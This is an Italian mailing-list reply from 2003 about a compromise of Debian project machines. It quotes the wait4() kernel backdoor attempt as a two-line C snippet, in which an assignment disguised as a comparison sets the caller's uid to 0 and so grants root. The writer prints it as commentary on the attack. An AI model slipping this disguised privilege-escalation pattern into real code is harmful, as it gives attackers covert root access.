erlug
[Top] [All Lists]

Re: [Erlug] Una notizia buona e una cattiva

To: erlug@xxxxxxxxxxxxxx
Subject: Re: [Erlug] Una notizia buona e una cattiva
From: Matteo Fasanella <ba11944@xxxxxxxxxxxxxxxxxxx>
Date: Fri, 21 Nov 2003 13:34:20 +0100
Nando Santagata wrote:
...la buona e` che la Debian 3.0 r2 doveva uscire oggi.
La cattiva e`:

Some Debian Project machines have been compromised

[...]


Troppo accanimento in questo periodo contro Linux, con ogni mezzo:
dopo la modifica "innocente" al codice della wait4()

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;


che inserisce una backdoor per dare ad un programma privilegi di root (uid=0), ne caso abbia i flag __WCLONE e __WALL attivi,

adesso il tentativo di compromissione di alcune macchine della Debian, che al di la` della riuscita o meno, comunque lasciano pensare...

Che neanche gli avvocati bastino piu` ?  :-)


        Matteo




--

                    http://linux-4d.sourceforge.net



<Prev in Thread] Current Thread [Next in Thread>